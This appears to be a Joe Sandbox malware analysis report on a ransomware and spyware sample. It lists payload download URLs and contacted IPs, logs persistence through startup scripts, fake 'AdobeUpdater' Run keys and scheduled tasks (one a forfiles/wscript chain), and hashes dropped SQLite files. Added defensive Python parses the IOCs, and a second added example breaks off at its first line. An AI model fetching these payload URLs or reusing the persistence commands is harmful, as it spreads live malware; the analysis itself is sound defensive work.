http://5.42.66.10/download/th/retail.php.9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp | malicious: false
https://dod.fastbutters.com:80/style/060.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp | malicious: false
http://5.42.66.10/download/th/getimage12.php9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | malicious: false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchu5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmp | malicious: false
http://5.42.66.10/download/123p.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | malicious: false
https://sectigo.com/CPS0DVtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmp | malicious: false
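The URL strings above and the contacted-IP table that follows the map legend are what an analyst turns into blocklist entries, and the extraction flattens both into fused fields. The Python below is an added example and not part of the Joe Sandbox report: it parses the IP table as the text renders it (three lines per row, ASN number and Malicious flag fused to the ASN name), extracts hostnames from the memory URLs, reports which memory-URL hosts are corroborated by an actually contacted address, and runs constructed firewall log lines against the result. The table excerpt and URLs are copied from this report; the log lines, the SHARED_HOSTING_ASNS set and the block-versus-alert policy are assumptions of the example.

```python
"""Turn the flattened Joe Sandbox network tables into usable IOCs.

Added example, not code from the report. The table text and URLs are copied
from the report; the firewall log lines at the bottom are constructed.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Rows of the report's "IP / Domain / Country / ASN / ASN Name / Malicious"
# table exactly as the text extraction flattens them: three lines per row.
# Subset of the rows shown in the report.
IP_TABLE_TEXT = """\
185.172.128.90
unknownRussian Federation
50916NADYMSS-ASRUfalse
185.172.128.76
unknownRussian Federation
50916NADYMSS-ASRUtrue
104.21.86.198
unknownUnited States
13335CLOUDFLARENETUSfalse
5.42.66.10
unknownRussian Federation
39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse
"""

# URLs recovered from process memory in the report (only the host matters here).
MEMORY_URLS = [
    "http://5.42.66.10/download/th/retail.php",
    "http://5.42.66.10/download/123p.exe",
    "http://5.42.66.10/download/th/getimage12.php",
    "https://dod.fastbutters.com:80/style/060.exe",
    "https://cheremushki.net/ba05c0a0a72880db02f3b2bf7866285a/7725eaa6592c80f8124e769b4e8a07f7.exe",
    "http://crl.thawte.com/ThawteTimestampingCA.crl",  # benign: CRL fetch by signature checks
]

# Assumption: ASNs whose addresses front thousands of unrelated tenants. An IP
# block here causes collateral damage, so alert and block on the hostname instead.
SHARED_HOSTING_ASNS = {13335}  # CLOUDFLARENET

# "<asn digits><asn name, country code fused><true|false>"
ASN_LINE = re.compile(r"^(\d+)(.*?)(true|false)$")


@dataclass(frozen=True)
class Contact:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str   # kept as the report fuses it, e.g. "NADYMSS-ASRU"
    malicious: bool


def parse_ip_table(text: str) -> dict[str, Contact]:
    """Parse the flattened three-line rows into Contact records keyed by IP."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 3:
        raise ValueError("flattened table must have three lines per row")
    contacts: dict[str, Contact] = {}
    for ip, dom_country, asn_line in zip(lines[0::3], lines[1::3], lines[2::3]):
        # The Domain column reads "unknown" for every row in this report.
        if dom_country.startswith("unknown"):
            domain, country = "unknown", dom_country[len("unknown"):]
        else:
            domain, country = "", dom_country
        m = ASN_LINE.match(asn_line)
        if not m:
            raise ValueError(f"cannot parse ASN line: {asn_line!r}")
        contacts[ip] = Contact(ip, domain, country, int(m.group(1)),
                               m.group(2), m.group(3) == "true")
    return contacts


def url_hosts(urls: list[str]) -> set[str]:
    return {urlsplit(u).hostname for u in urls}


def corroborated_ips(contacts: dict[str, Contact], urls: list[str]) -> set[str]:
    """Literal-IP hosts in memory URLs that the sample was also seen contacting."""
    return {h for h in url_hosts(urls) if h in contacts}


def block_action(c: Contact) -> str:
    """Assumed policy: never IP-block shared CDN addresses, only alert on them."""
    if c.asn in SHARED_HOSTING_ASNS:
        return "alert-only (shared CDN address)"
    return "block"


# Constructed log format: "<timestamp> <verdict> <src> <dst>:<port>"
LOG_LINE = re.compile(r"^\S+ \S+ (?P<src>\S+) (?P<dst>\d+\.\d+\.\d+\.\d+):(?P<port>\d+)")


def match_firewall_log(contacts: dict[str, Contact], log_lines: list[str]) -> list[tuple[str, Contact]]:
    """Return (source host, Contact) for every log line whose destination is in the table."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and m.group("dst") in contacts:
            hits.append((m.group("src"), contacts[m.group("dst")]))
    return hits


# Constructed firewall lines, not from the report.
SAMPLE_LOG = [
    "2024-04-22T10:01:02Z allow 10.0.0.15 5.42.66.10:80",
    "2024-04-22T10:01:05Z allow 10.0.0.15 185.172.128.76:80",
    "2024-04-22T10:01:07Z allow 10.0.0.15 104.21.86.198:443",
    "2024-04-22T10:01:09Z allow 10.0.0.23 8.8.8.8:53",
]

if __name__ == "__main__":
    table = parse_ip_table(IP_TABLE_TEXT)
    print("memory-URL hosts corroborated by a contacted IP:", corroborated_ips(table, MEMORY_URLS))
    for src, c in match_firewall_log(table, SAMPLE_LOG):
        print(f"{src} -> {c.ip} ({c.asn_name}, report-malicious={c.malicious}): {block_action(c)}")
```

Two caveats when using the output. The report's Malicious column is Joe Sandbox's reputation verdict for the address, and only 185.172.128.76 carries it; every other row was still contacted by the sample during the run, so a false there means "no prior reputation", not "safe". And the 104.21.x / 172.67.x rows are Cloudflare front-end addresses shared by unrelated sites, which is why the example refuses to emit an IP block for ASN 13335 and a hostname indicator is the right artefact for those.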
Map legend (share of contacted IPs per country): < 25%, 25% to 50%, 50% to 75%, > 75%
IP | Domain | Country | ASN | ASN Name | Malicious
185.172.128.90 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
34.117.186.192 | unknown | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
85.192.56.26 | unknown | Russian Federation | 12695 | DINET-ASRU | false
37.221.125.202 | unknown | Lithuania | 62416 | PTSERVIDORPT | false
193.233.132.175 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
185.172.128.76 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | true
176.97.76.106 | unknown | United Kingdom | 43658 | INTRAFFIC-ASUA | false
193.233.132.253 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
104.21.86.198 | unknown | United States | 13335 | CLOUDFLARENETUS | false
87.240.137.164 | unknown | Russian Federation | 47541 | VKONTAKTE-SPB-AShttpvkcomRU | false
193.233.132.234 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
37.228.108.132 | unknown | Norway | 39832 | NO-OPERANO | false
185.172.128.59 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
172.67.161.113 | unknown | United States | 13335 | CLOUDFLARENETUS | false
176.113.115.135 | unknown | Russian Federation | 49505 | SELECTELRU | false
104.21.49.118 | unknown | United States | 13335 | CLOUDFLARENETUS | false
95.142.206.3 | unknown | Russian Federation | 47541 | VKONTAKTE-SPB-AShttpvkcomRU | false
104.21.79.77 | unknown | United States | 13335 | CLOUDFLARENETUS | false
95.142.206.0 | unknown | Russian Federation | 47541 | VKONTAKTE-SPB-AShttpvkcomRU | false
104.21.31.124 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.21.63.150 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.21.90.14 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.169.89 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.188.178 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.20.3.235 | unknown | United States | 13335 | CLOUDFLARENETUS | false
185.172.128.228 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
172.67.176.131 | unknown | United States | 13335 | CLOUDFLARENETUS | false
186.145.236.18 | unknown | Colombia | 14080 | TelmexColombiaSACO | false
185.172.128.203 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
172.67.144.181 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.75.166 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.21.55.189 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.26.8.59 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.180.119 | unknown | United States | 13335 | CLOUDFLARENETUS | false
5.42.66.10 | unknown | Russian Federation | 39493 | RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU | false
172.67.193.79 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.20.4.235 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.19.24 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                                                                                                                                107.167.110.218
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                21837OPERASOFTWAREUSfalse
                                                                                                                                                                                                                                107.167.110.216
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                21837OPERASOFTWAREUSfalse
                                                                                                                                                                                                                                104.18.11.89
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.21.4.208
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                107.167.110.211
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                21837OPERASOFTWAREUSfalse
                                                                                                                                                                                                                                45.130.41.108
                                                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                                                198610BEGET-ASRUfalse
                                                                                                                                                                                                                                107.167.125.189
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                21837OPERASOFTWAREUSfalse
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430552
Start date and time: 2024-04-23 21:36:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 15m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 51
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@208/425@0/45
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 84%
• Number of executed functions: 108
• Number of non-executed functions: 274
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Skipping network analysis since the amount of network traffic is too extensive
• VT rate limit hit for: file.exe
Time | Type | Description
21:37:08 | API Interceptor | 749x Sleep call for process: AddInProcess32.exe modified
21:37:14 | API Interceptor | 15x Sleep call for process: 9wqoiPpK0NIQEBygxfm6h42G.exe modified
21:37:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat
21:37:20 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
21:37:24 | API Interceptor | 334x Sleep call for process: u69w.0.exe modified
21:37:25 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gsl02wkLG0QjvXiDlgL1h1Gi.bat
21:37:30 | Task Scheduler | Run new task: bWycNackLSywaqkmgR path: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe s>em /VNsite_idnLd 385118 /S
21:37:30 | API Interceptor | 382x Sleep call for process: u4dc.0.exe modified
21:37:55 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JlRLEIpF3kijytHz1FaeY3WZ.bat
21:38:03 | API Interceptor | 3x Sleep call for process: 0FR80IiNvxJZyXnpOgiDlYNV.exe modified
21:38:16 | API Interceptor | 3x Sleep call for process: zUOgRazdYnb35XHU4UIsV9Yc.exe modified
21:38:17 | API Interceptor | 3x Sleep call for process: PA8JWMmRYiQsN7iqTjOvjsbW.exe modified
21:38:17 | API Interceptor | 3x Sleep call for process: OYqxk9G3x4R05N4I0KLZXbXg.exe modified
21:38:18 | API Interceptor | 3x Sleep call for process: 68bEfZA6FBu6lC5BaADYSIdx.exe modified
21:38:23 | Task Scheduler | Run new task: MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR path: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
21:38:23 | Task Scheduler | Run new task: MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG path: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
21:38:44 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4wmr0Bf4EXaMCuRI7IEqrEN.bat
21:39:00 | API Interceptor | 1x Sleep call for process: koEMGMU.exe modified
21:39:05 | Task Scheduler | Run new task: BAnwxolbGpCzXNxkj path: C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JUnCNhn.exe s>XT /VCsite_idxGE 385118 /S
21:39:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe
21:39:22 | Task Scheduler | Run new task: MrNSpwukvDtlP2 path: C:\Windows\system32\forfiles.exe s>/p C:\Windows\system32 /m wscript.exe /c "cmd /C @FNAME ^"C:\ProgramData\wGkeBUkfAIhWvVVB\nWLJJTZ.wsf^""
21:39:29 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe
21:39:37 | Task Scheduler | Run new task: Opera scheduled Autoupdate 1713901169 path: C:\Users\user\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe s>--scheduledtask --bypasslauncher $(Arg0)
Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8501914549146043
Encrypted: false
SSDEEP: 24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
MD5: 3BD8534EE37F707CEE75F67A6F27C5BD
SHA1: C02E6D9D228504D8C11FD7F24D26B367AB013D46
SHA-256: 2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
SHA-512: 30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
Malicious: false
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6868290294905215
Encrypted: false
SSDEEP: 24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5: E655D05DEDA782A6FE1E44028236D3A4
SHA1: ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256: 69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512: 25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious: false
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.690067217069288
Encrypted: false
SSDEEP: 12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5: 4E32787C3D6F915D3CB360878174E142
SHA1: 57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256: 2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512: CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious: false
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6732424250451717
Encrypted: false
SSDEEP: 24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5: CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1: 3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256: EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512: 0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious: false
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209935793793442
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
MD5: 214CFA91B0A6939C4606C4F99C9183B3
SHA1: A36951EB26E00F95BFD44C0851827A032EAFD91A
SHA-256: 660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
SHA-512: E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
Malicious: false
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 5242880
Entropy (8bit): 0.03779668081370459
Encrypted: false
SSDEEP: 192:58rJQaXoMXp0VW9FxWZh1B++NbBl3D56+9H9HI:58r54w0VW3xWZhW+Ff3AW9
MD5: F5A3FAA39A2FDA10356E1889BC81EA55
SHA1: FD4D7CF58C33C8583E45D88A2F89B8F66770644B
SHA-256: 55BDD67E95C3B441AE02D26939E484E14B14550F5A273F3E35ADE569ABA8FAF9
SHA-512: 28766C6C4FCB65CF9B436ED51708FABF3E2D8F8B3344F80B64A93994EE170DBB25025DBDB164A22636C1354139215A8B4181AC35D9E98A9950E9C1ECF1473D7F
Malicious: false
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
Reputation: unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1366744760037832
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cZ/Q4:MnlyfnGtxnfVuSVumEHZY4
                                                                                                                                                                                                                                MD5:403AF73130A55F1DF5D5D597717A386C
                                                                                                                                                                                                                                SHA1:AA0262EE3F7188D59D5859AF240B725AA9252212
                                                                                                                                                                                                                                SHA-256:A225C7166B6841D04F34589DB373472CA34525F88A644B5903733563372642AD
                                                                                                                                                                                                                                SHA-512:B70388D614814369D8DB9E4F3F20FB2F16EED5A65893DC7A8872E8FC462A7338F929A0777B4D18B77E1F4A6864CDA790ABD91116C9D1483DFFB64173699EEAEF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u69w.0.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.8501914549146043
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
                                                                                                                                                                                                                                MD5:3BD8534EE37F707CEE75F67A6F27C5BD
                                                                                                                                                                                                                                SHA1:C02E6D9D228504D8C11FD7F24D26B367AB013D46
                                                                                                                                                                                                                                SHA-256:2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
                                                                                                                                                                                                                                SHA-512:30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
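The File Type values above are libmagic's decoding of the 100-byte SQLite 3 file header (the "file counter" is the header's file change counter, "cookie" is the schema cookie, "version-valid-for" ties the page count to a change counter value). The following Python, added here and not part of the Joe Sandbox report, decodes those same fields directly and adds the check a triager wants on a dropped database: whether the declared page size times page count equals the dropped file's size, which distinguishes an intact copy from a truncated one. The header bytes are constructed (not taken from the sample) to match the 51200-byte drop with MD5 9E68EA772705B5EC0C83C2A97BB26324: page size 2048, 25 pages, counter 1, cookie 0xe, schema 4, UTF-8, version-valid-for 1, SQLite 3042000; function names are this example's own.

```python
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
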